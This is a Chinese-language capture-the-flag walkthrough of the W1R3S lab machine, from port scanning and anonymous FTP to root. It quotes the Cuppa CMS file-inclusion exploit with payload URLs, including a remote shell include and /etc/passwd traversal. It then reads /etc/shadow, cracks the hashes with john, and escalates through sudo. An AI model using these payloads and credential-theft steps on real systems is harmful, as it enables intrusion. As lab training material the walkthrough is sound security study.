信息收集

  • Kali 和 靶机都处于同一网段内,直接查找靶机 IP 地址:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
root at kali in ~
$ nmap -sn --min-rate 10000 192.168.92.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-01 23:18 CST
Nmap scan report for 192.168.92.1
Host is up (0.00029s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.92.2
Host is up (0.00014s latency).
MAC Address: 00:50:56:F3:1F:1F (VMware)
Nmap scan report for 192.168.92.173
MAC Address: 00:0C:29:AA:7F:FC (VMware)
Nmap scan report for 192.168.92.254
Host is up (0.00014s latency).
MAC Address: 00:50:56:FF:22:F3 (VMware)
Nmap scan report for 192.168.92.170
Host is up.                                                                                   
Nmap done: 256 IP addresses (5 hosts up) scanned in 11.38 seconds
  • 扫描开放端口:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
root at kali in ~ 
$ nmap -p- --min-rate 10000 192.168.92.173
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-01 23:20 CST
Nmap scan report for 192.168.92.173
Host is up (0.00018s latency).
Not shown: 55528 filtered tcp ports (no-response), 10003 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp 
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
MAC Address: 00:0C:29:AA:7F:FC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 19.97 seconds
  • 扫描端口对应服务:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
root at kali in ~ 
$ nmap -p21,22,80,3306 -sT -sV -O 192.168.92.173
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-01 23:22 CST
Nmap scan report for 192.168.92.173
Host is up (0.00047s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
MAC Address: 00:0C:29:AA:7F:FC (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5.1
OS details: Linux 3.2 - 4.9, Linux 5.1
Network Distance: 1 hop
Service Info: Host: W1R3S.inc; OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.14 seconds
  • 针对端口服务扫描一下漏洞:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
root at kali in ~
$ nmap --script=vuln -p21,22,80,3306 --min-rate 10000 192.168.92.173
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-02 19:46 CST
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Host is up (0.00059s latency).

PORT     STATE SERVICE                                                                                                                            
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum: 
|_  /wordpress/wp-login.php: Wordpress login page.
3306/tcp open  mysql
MAC Address: 00:0C:29:AA:7F:FC (VMware)

Nmap done: 1 IP address (1 host up) scanned in 353.19 seconds
  • 分析一下扫描结果:
1
2
3
4
5
6
# 开放 21、22、80、3306 端口

21 - FTP 服务 - 匿名登录、弱口令、暴力破解
22 - SSH 服务 - 弱口令、暴力破解
80 - Web 服务 - 漏洞形式多样
3306 - MySQL 服务 - 弱口令、暴力破解
  • 根据经验 FTP 比 Web 服务利用简单,尝试一下。

FTP 匿名登录

  • 打开 MSF 框架扫描一下 FTP 匿名登录:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
msf6 > search auxiliary/scanner/ftp

Matching Modules
================

   #  Name                                           Disclosure Date  Rank    Check  Description
   -  ----                                           ---------------  ----    -----  -----------
   0  auxiliary/scanner/ftp/anonymous                                 normal  No     Anonymous FTP Access Detection
   1  auxiliary/scanner/ftp/bison_ftp_traversal      2015-09-28       normal  Yes    BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure
   2  auxiliary/scanner/ftp/colorado_ftp_traversal   2016-08-11       normal  Yes    ColoradoFTP Server 1.3 Build 8 Directory Traversal Information Disclosure
   3  auxiliary/scanner/ftp/easy_file_sharing_ftp    2017-03-07       normal  Yes    Easy File Sharing FTP Server 3.6 Directory Traversal
   4  auxiliary/scanner/ftp/ftp_login                                 normal  No     FTP Authentication Scanner
   5  auxiliary/scanner/ftp/ftp_version                               normal  No     FTP Version Scanner
   6  auxiliary/scanner/ftp/konica_ftp_traversal     2015-09-22       normal  Yes    Konica Minolta FTP Utility 1.00 Directory Traversal Information Disclosure
   7  auxiliary/scanner/ftp/pcman_ftp_traversal      2015-09-28       normal  Yes    PCMan FTP Server 2.0.7 Directory Traversal Information Disclosure
   8  auxiliary/scanner/ftp/titanftp_xcrc_traversal  2010-06-15       normal  No     Titan FTP XCRC Directory Traversal Information Disclosure

Interact with a module by name or index. For example info 8, use 8 or use auxiliary/scanner/ftp/titanftp_xcrc_traversal

msf6 > use 0
msf6 auxiliary(scanner/ftp/anonymous) > show options

Module options (auxiliary/scanner/ftp/anonymous):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOSTS                        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    21                   yes       The target port (TCP)
   THREADS  1                    yes       The number of concurrent threads (max one per host)


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/ftp/anonymous) > set RHOSTS 192.168.92.173                                                                                                                            
RHOSTS => 192.168.92.173
msf6 auxiliary(scanner/ftp/anonymous) > run

[+] 192.168.92.173:21     - 192.168.92.173:21 - Anonymous READ (220 Welcome to W1R3S.inc FTP service.)
[*] 192.168.92.173:21     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
  • 存在有 FTP 匿名登录,但是是 READ 只读的,说明无法上传文件,访问一下(anonymous):
1
2
3
4
5
6
7
8
9
10
11
root at kali in ~                                                                             │
$ ftp 192.168.92.173                                                                          │
Connected to 192.168.92.173.                                                                  │
220 Welcome to W1R3S.inc FTP service.                                                         │
Name (192.168.92.173:root): anonymous                                                         │
331 Please specify the password.                                                              │
Password:                                                                                     │
230 Login successful.                                                                         │
Remote system type is UNIX.                                                                   │
Using binary mode to transfer files.                                                          │
ftp>
  • 查看是否存在文件,若有则进行下载:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
ftp> ls                                                                                       
229 Entering Extended Passive Mode (|||46843|)                                                
150 Here comes the directory listing.                                                         
drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 content                               
drwxr-xr-x    2 ftp      ftp          4096 Jan 23  2018 docs                                  
drwxr-xr-x    2 ftp      ftp          4096 Jan 28  2018 new-employees
226 Directory send OK.

ftp> cd content
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||42594|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp            29 Jan 23  2018 01.txt
-rw-r--r--    1 ftp      ftp           165 Jan 23  2018 02.txt
-rw-r--r--    1 ftp      ftp           582 Jan 23  2018 03.txt
226 Directory send OK.
ftp> mget *
mget 01.txt [anpqy?]?
229 Entering Extended Passive Mode (|||43127|)
150 Opening BINARY mode data connection for 01.txt (29 bytes).
100% |*************************************************|    29      277.64 KiB/s    00:00 ETA
226 Transfer complete.
29 bytes received in 00:00 (32.25 KiB/s)
mget 02.txt [anpqy?]?
229 Entering Extended Passive Mode (|||43233|)
150 Opening BINARY mode data connection for 02.txt (165 bytes).
100% |*************************************************|   165      735.76 KiB/s    00:00 ETA
226 Transfer complete.
165 bytes received in 00:00 (130.36 KiB/s)
mget 03.txt [anpqy?]?
229 Entering Extended Passive Mode (|||47508|)
150 Opening BINARY mode data connection for 03.txt (582 bytes).
100% |*************************************************|   582        5.09 MiB/s    00:00 ETA 
226 Transfer complete.
582 bytes received in 00:00 (776.44 KiB/s)
ftp> cd docs
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||46369|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp           138 Jan 23  2018 worktodo.txt
226 Directory send OK.
ftp> mget *
mget worktodo.txt [anpqy?]?
229 Entering Extended Passive Mode (|||46797|)
150 Opening BINARY mode data connection for worktodo.txt (138 bytes).
100% |*************************************************|   138      175.24 KiB/s    00:00 ETA
226 Transfer complete.
138 bytes received in 00:00 (92.24 KiB/s)

ftp> cd new-employees
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||42198|)
150 Here comes the directory listing.
-rw-r--r--    1 ftp      ftp           155 Jan 28  2018 employee-names.txt
226 Directory send OK.
ftp> mget *
mget employee-names.txt [anpqy?]?
229 Entering Extended Passive Mode (|||48121|)
150 Opening BINARY mode data connection for employee-names.txt (155 bytes).
100% |*************************************************|   155      158.49 KiB/s    00:00 ETA
226 Transfer complete.
155 bytes received in 00:00 (82.62 KiB/s)
  • 下载到 5 个文件,依次查看一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
root at kali in ~ 
$ ll *.txt
-rw-r--r-- 1 root root  29 2018年 1月23日 01.txt
-rw-r--r-- 1 root root 165 2018年 1月23日 02.txt
-rw-r--r-- 1 root root 582 2018年 1月23日 03.txt
-rw-r--r-- 1 root root 155 2018年 1月29日 employee-names.txt
-rw-r--r-- 1 root root 138 2018年 1月23日 worktodo.txt

root at kali in ~ 
$ cat 01.txt                                    
New FTP Server For W1R3S.inc

root at kali in ~ 
$ cat 02.txt
#
#
#
#
#
#
#
#
01ec2d8fc11c493b25029fb1f47f39ce
#
#
#
#
#
#
#
#
#
#
#
#
#
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
############################################

root at kali in ~ 
$ cat 03.txt 
___________.__              __      __  ______________________   _________    .__               
\__    ___/|  |__   ____   /  \    /  \/_   \______   \_____  \ /   _____/    |__| ____   ____  
  |    |   |  |  \_/ __ \  \   \/\/   / |   ||       _/ _(__  < \_____  \     |  |/    \_/ ___\ 
  |    |   |   Y  \  ___/   \        /  |   ||    |   \/       \/        \    |  |   |  \  \___ 
  |____|   |___|  /\___  >   \__/\  /   |___||____|_  /______  /_______  / /\ |__|___|  /\___  >
                \/     \/         \/                \/       \/        \/  \/         \/     \/ 

root at kali in ~ 
$ cat employee-names.txt 
The W1R3S.inc employee list

Naomi.W - Manager
Hector.A - IT Dept
Joseph.G - Web Design
Albert.O - Web Design
Gina.L - Inventory
Rico.D - Human Resources

root at kali in ~ 
$ cat worktodo.txt      
        ı pou,ʇ ʇɥıuʞ ʇɥıs ıs ʇɥǝ ʍɐʎ ʇo ɹooʇ¡

....punoɹɐ ƃuıʎɐןd doʇs ‘op oʇ ʞɹoʍ ɟo ʇoן ɐ ǝʌɐɥ ǝʍ
  • 五个文件依次查看后,发现:
    • 01、03 没啥有用信息
    • 02 像是存在两个编码
    • employee-names 像是账密文件
    • worktodo 像是英文被颠倒了
  • 一个一个来,先判断一下加密类型:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
root at kali in ~
$ hash-identifier 01ec2d8fc11c493b25029fb1f47f39ce
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################                                                                                                                  
--------------------------------------------------

Possible Hashs:                                                                                                                                                                               
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
Least Possible Hashs:
[+] RAdmin v2.x
[+] NTLM
[+] MD4                                

root at kali in ~
$ hash-identifier 'SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg=='
   #########################################################################                                                                      
   #     __  __                     __           ______    _____           #                                                                      
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #                                                                      
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #                                                                      
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #                                                                      
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #                                                                      
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #                                                                      
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #                                                                      
   #                                                             By Zion3R #                                                                      
   #                                                    www.Blackploit.com #                                                                      
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------

 Not Found.                         
--------------------------------------------------
  • 判断出第一个字符串是 md5,第二个不是 hash,但是结尾有两个 =,判断是 base64,解密一下试试:
1
2
3
root at kali in ~ 
$ echo 'SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==' | base64 -d
It is easy, but not that easy..
  • 很明显的废话,碰撞一下 md5:

image-20231111101251160

1
2
i don't think this is the way to root!
we have a ןot of work to do‘ stop pןaying around˙˙˙˙
  • 也没啥用。

目录扫描

  • 访问 Web 服务:

image-20231111101255853

  • 熟悉的界面,一看就知道需要目录扫描,使用 dirsearch 扫一扫:
1
2
3
root at kali in ~         
$ dirsearch -u 'http://192.168.92.173'
/root/.dirsearch/reports/192.168.92.173/_23-07-02_19-06-00.txt

image-20231111101309591

  • 发现几个目录,访问一下:

image-20231111101737277
image-20231111101741222

  • 发现一个 cuppa CMS 和一个访问不了的 wordpress。

Cuppa CMS

  • 查找一下 CMS 漏洞:
1
2
3
4
5
6
7
8
root at kali in ~ 
$ searchsploit -t cuppa     
---------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                  |  Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion                                                 | php/webapps/25971.txt
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
  • 发现确实有一个文件包含漏洞,下载到当前目录,查看一下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
root at kali in ~
$ searchsploit -m 25971.txt
  Exploit: Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion
      URL: https://www.exploit-db.com/exploits/25971
     Path: /usr/share/exploitdb/exploits/php/webapps/25971.txt
    Codes: OSVDB-94101
 Verified: True
File Type: C++ source, ASCII text, with very long lines (876)
Copied to: /root/25971.txt
root at kali in ~
$ cat 25971.txt
# Exploit Title   : Cuppa CMS File Inclusion
# Date            : 4 June 2013
# Exploit Author  : CWH Underground
# Site            : www.2600.in.th
# Vendor Homepage : http://www.cuppacms.com/
# Software Link   : http://jaist.dl.sourceforge.net/project/cuppacms/cuppa_cms.zip
# Version         : Beta
# Tested on       : Window and Linux 

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /
  / XXXXXX /
 (________(
  `------'

#################################### 
VULNERABILITY: PHP CODE INJECTION
#################################### 

/alerts/alertConfigField.php (LINE: 22)

-----------------------------------------------------------------------------
LINE 22:
        <?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------


#####################################################
DESCRIPTION
#####################################################

An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the fil
e name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vul
nerability can lead to full server compromise.

http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]

#####################################################
EXPLOIT
#####################################################

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Moreover, We could access Configuration.php source code via PHPStream

For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------

Base64 Encode Output:
-----------------------------------------------------------------------------
PD9waHAgCgljbGFzcyBDb25maWd1cmF0aW9uewoJCXB1YmxpYyAkaG9zdCA9ICJsb2NhbGhvc3QiOwoJCXB1YmxpYyAkZGIgPSAiY3VwcGEiOwoJCXB1YmxpYyAkdXNlciA9ICJyb290IjsKCQ
lwdWJsaWMgJHBhc3N3b3JkID0gIkRiQGRtaW4iOwoJCXB1YmxpYyAkdGFibGVfcHJlZml4ID0gImN1XyI7CgkJcHVibGljICRhZG1pbmlzdHJhdG9yX3RlbXBsYXRlID0gImRlZmF1bHQiOwoJ
CXB1YmxpYyAkbGlzdF9saW1pdCA9IDI1OwoJCXB1YmxpYyAkdG9rZW4gPSAiT0JxSVBxbEZXZjNYIjsKCQlwdWJsaWMgJGFsbG93ZWRfZXh0ZW5zaW9ucyA9ICIqLmJtcDsgKi5jc3Y7ICouZG
9jOyAqLmdpZjsgKi5pY287ICouanBnOyAqLmpwZWc7ICoub2RnOyAqLm9kcDsgKi5vZHM7ICoub2R0OyAqLnBkZjsgKi5wbmc7ICoucHB0OyAqLnN3ZjsgKi50eHQ7ICoueGNmOyAqLnhsczsg
Ki5kb2N4OyAqLnhsc3giOwoJCXB1YmxpYyAkdXBsb2FkX2RlZmF1bHRfcGF0aCA9ICJtZWRpYS91cGxvYWRzRmlsZXMiOwoJCXB1YmxpYyAkbWF4aW11bV9maWxlX3NpemUgPSAiNTI0Mjg4MC
I7CgkJcHVibGljICRzZWN1cmVfbG9naW4gPSAwOwoJCXB1YmxpYyAkc2VjdXJlX2xvZ2luX3ZhbHVlID0gIiI7CgkJcHVibGljICRzZWN1cmVfbG9naW5fcmVkaXJlY3QgPSAiIjsKCX0gCj8+
-----------------------------------------------------------------------------

Base64 Decode Output:
-----------------------------------------------------------------------------
<?php
        class Configuration{
                public $host = "localhost";
                public $db = "cuppa";
                public $user = "root";
                public $password = "Db@dmin";
                public $table_prefix = "cu_";
                public $administrator_template = "default";
                public $list_limit = 25;
                public $token = "OBqIPqlFWf3X";
                public $allowed_extensions = "*.bmp; *.csv; *.doc; *.gif; *.ico; *.jpg; *.jpeg; *.odg; *.odp; *.ods; *.odt; *.pdf; *.png; *.ppt; *
.swf; *.txt; *.xcf; *.xls; *.docx; *.xlsx";
                public $upload_default_path = "media/uploadsFiles";
                public $maximum_file_size = "5242880";
                public $secure_login = 0;
                public $secure_login_value = "";
                public $secure_login_redirect = "";
        }
?>
-----------------------------------------------------------------------------

Able to read sensitive information via File Inclusion (PHP Stream)

################################################################################################################
 Greetz      : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
  • 尝试使用一下:
1
http://192.168.92.173/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

image-20231111101932112

  • 发现啥也没有显示,但是根据上面的漏洞脚本,发现代码是这样的:
1
<?php include($_REQUEST["urlConfig"]); ?>
  • 使用 POST 传输试试:

image-20231111101940489

  • 得到结果,说明漏洞确实存在,访问 /etc/shadow 文件去爆破密码:

image-20231111101951187

  • 得到结果如下:
1
2
3
4
5
6
7
8
9
10
11
root:$6$vYcecPCy$JNbK.hr7HU72ifLxmjpIP9kTcx./ak2MM3lBs.Ouiu0mENav72TfQIs8h1jPm2rwRFqd87HDC0pi7gn9t7VgZ0:17554:0:99999:7:::
daemon:*:17379:0:99999:7:::
......
proxy:*:17379:0:99999:7:::
www-data:$6$8JMxE7l0$yQ16jM..ZsFxpoGue8/0LBUnTas23zaOqg2Da47vmykGTANfutzM8MuFidtb0..Zk.TUKDoDAVRCoXiZAH.Ud1:17560:0:99999:7:::
backup:*:17379:0:99999:7:::
.......
saned:*:17379:0:99999:7:::
usbmux:*:17379:0:99999:7:::
w1r3s:$6$xe/eyoTx$gttdIYrxrstpJP97hWqttvc5cGzDNyMb0vSuppux4f2CcBv3FwOt2P1GFLjZdNqjwRuP3eUjkgb/io7x9q1iP.:17567:0:99999:7:::
......
  • 将结果保存成文件,使用 john 进行爆破:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root at kali in ~ 
$ john md5
Created directory: /root/.john
Warning: detected hash type "sha512crypt", but the string is also recognized as "HMAC-SHA256"
Use the "--format=HMAC-SHA256" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
www-data         (www-data)     
Almost done: Processing the remaining buffered candidate passwords, if any.
Proceeding with wordlist:/usr/share/john/password.lst
computer         (w1r3s)
  • 找到了账号密码,登录试试:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
root at kali in ~ 
$ ssh w1r3s@192.168.92.173 
The authenticity of host '192.168.92.173 (192.168.92.173)' can't be established.
ED25519 key fingerprint is SHA256:Bue5VbUKeMSJMQdicmcMPTCv6xvD7I+20Ki8Um8gcWM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.92.173' (ED25519) to the list of known hosts.
----------------------
Think this is the way?
----------------------
Well,........possibly.
----------------------
w1r3s@192.168.92.173's password: 
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.13.0-36-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

641 packages can be updated.
490 updates are security updates.

New release '18.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

.....You made it huh?....
Last login: Mon Jan 22 22:47:27 2018 from 192.168.0.35
w1r3s@W1R3S:~$ id
uid=1000(w1r3s) gid=1000(w1r3s) groups=1000(w1r3s),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
  • 登录成功!

SUDO 提权

  • 查看一下当前账户可以执行什么命令:
1
2
3
4
5
6
7
w1r3s@W1R3S:~$ sudo -l
[sudo] password for w1r3s: 
Matching Defaults entries for w1r3s on W1R3S.localdomain:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User w1r3s may run the following commands on W1R3S.localdomain:
    (ALL : ALL) ALL
  • 3A 权限,之前调用 bash 即可提权:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
w1r3s@W1R3S:~$ sudo /bin/bash
root@W1R3S:~# id
uid=0(root) gid=0(root) groups=0(root)
root@W1R3S:~# cd /root
root@W1R3S:/root# ls
flag.txt
root@W1R3S:/root# cat flag.txt
-----------------------------------------------------------------------------------------                                                  [6/627]
   ____ ___  _   _  ____ ____      _  _____ _   _ _        _  _____ ___ ___  _   _ ____                                                           
  / ___/ _ \| \ | |/ ___|  _ \    / \|_   _| | | | |      / \|_   _|_ _/ _ \| \ | / ___|                                                          
 | |  | | | |  \| | |  _| |_) |  / _ \ | | | | | | |     / _ \ | |  | | | | |  \| \___ \                                                          
 | |__| |_| | |\  | |_| |  _ <  / ___ \| | | |_| | |___ / ___ \| |  | | |_| | |\  |___) |                                                         
  \____\___/|_| \_|\____|_| \_\/_/   \_\_|  \___/|_____/_/   \_\_| |___\___/|_| \_|____/                                                          
                                                                                                                                                  
-----------------------------------------------------------------------------------------

                          .-----------------TTTT_-----_______
                        /''''''''''(______O] ----------____  \______/]_
     __...---'"""\_ --''   Q                               ___________@
 |'''                   ._   _______________=---------"""""""
 |                ..--''|   l L |_l   |
 |          ..--''      .  /-___j '   '
 |    ..--''           /  ,       '   '
 |--''                /           `    \
                      L__'         \    -
                                    -    '-.
                                     '.    /
                                       '-./

----------------------------------------------------------------------------------------
  YOU HAVE COMPLETED THE
               __      __  ______________________   _________
              /  \    /  \/_   \______   \_____  \ /   _____/
              \   \/\/   / |   ||       _/ _(__  < \_____  \ 
               \        /  |   ||    |   \/       \/        \
                \__/\  /   |___||____|_  /______  /_______  /.INC
                     \/                \/       \/        \/        CHALLENGE, V 1.0
----------------------------------------------------------------------------------------

CREATED BY SpecterWires

----------------------------------------------------------------------------------------

知识点补充

  • leetspeak:又称为“火星文”。这个概念很难定义,虽然它活跃于网络上,但很难说这是一种网络语言,因为脑残体与自创词汇无关,仅仅是对汉字的一种扭曲的书写形式。它一般表现为在一个词或一句话甚至一段话的文字中,大量使用字形与原文部分相似的别字的行为。
  • 这些别字的来源五花八门,大多出自繁体汉字、日文汉字和生僻字(所谓的怪字、乱码字),另外也有部分简体汉字,甚至还有日文假名、汉语拼音字母等,有时还夹杂一大堆杂乱的符号。
  • 该字体的用处还可以用来注册公司名称,避免重名:Leetspeak Converter